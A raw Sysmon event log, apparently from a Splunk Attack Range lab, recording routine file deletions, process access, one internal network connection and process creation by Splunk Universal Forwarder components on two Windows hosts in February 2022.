23542300x8000000000000000287497Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:16.289{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBB9D28F850816F0B5724F2D4B8A4672,SHA256=7ED744B71B4AFEE0722D865956FABF54A7FBC0383638730B44C8C8F2E5D23A5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216390Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:17.722{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=726AD69348C4268BBDA0CCF8F74FE0C5,SHA256=BAEE27CE61CD4F4A467AE223EDE6FD3309BA0CCA636E4C74B441924366F2883B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287498Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:17.351{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BFA2B2C9886F07BBFA02A06B15F7CFA,SHA256=4034928E15C4F099E0CCA5515148E8C22911873A0C786E560C0A44D5B65BED9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287499Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:18.367{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC94C7231B131962FE7298AFB77278A1,SHA256=62C3D7578A1ACF0A9DF964585F5E188616557A5A945BB7289394A04B6D94BE3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216392Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:18.722{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F2260E2D90465929CBE73591097CAB9,SHA256=9A504516A5F08D378B25DE13E8C695969A1DA3562FC334D5261933496CAFB485,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216391Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:15.647{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51323-false10.0.1.12-8000- 23542300x8000000000000000216393Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:19.722{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAE9B4B973EFFDB252C8ACA91563788D,SHA256=107C6D17D094B6455CE4C86AB510FA11293E373F3520A768CFA58FAF2B1497D6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287517Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:19.945{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-112F-6216-0205-000000003802}4200C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287516Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:19.945{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287515Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:19.945{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287514Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:19.945{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287513Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:19.945{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287512Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:19.945{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-112F-6216-0205-000000003802}4200C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287511Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:19.945{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-112F-6216-0205-000000003802}4200C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287510Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:19.946{C8EA50B7-112F-6216-0205-000000003802}4200C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000287509Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:19.726{C8EA50B7-112F-6216-0105-000000003802}53844372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287508Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:19.445{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-112F-6216-0105-000000003802}5384C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287507Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:19.445{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287506Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:19.445{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287505Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:19.445{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287504Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:19.445{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287503Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:19.445{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-112F-6216-0105-000000003802}5384C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287502Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:19.445{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-112F-6216-0105-000000003802}5384C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287501Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:19.446{C8EA50B7-112F-6216-0105-000000003802}5384C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287500Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:19.398{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BF748B6CB02FD5C27BB13456A0526E0,SHA256=7D0A7BB6BA9A16E91002EE3696563C1BDA8546AC1945C399E5778A0342F31A41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216394Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:20.737{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E53F8954E7DEBDF7E0537D272C87607B,SHA256=71125D6229463AC120FA2058B71438A1B2F687BBA91CFC2E3CAE87AF6E06D6EC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287528Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:20.805{C8EA50B7-1130-6216-0305-000000003802}43765780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287527Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:20.507{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1130-6216-0305-000000003802}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287526Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:20.507{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287525Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:20.507{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287524Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:20.507{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287523Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:20.507{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 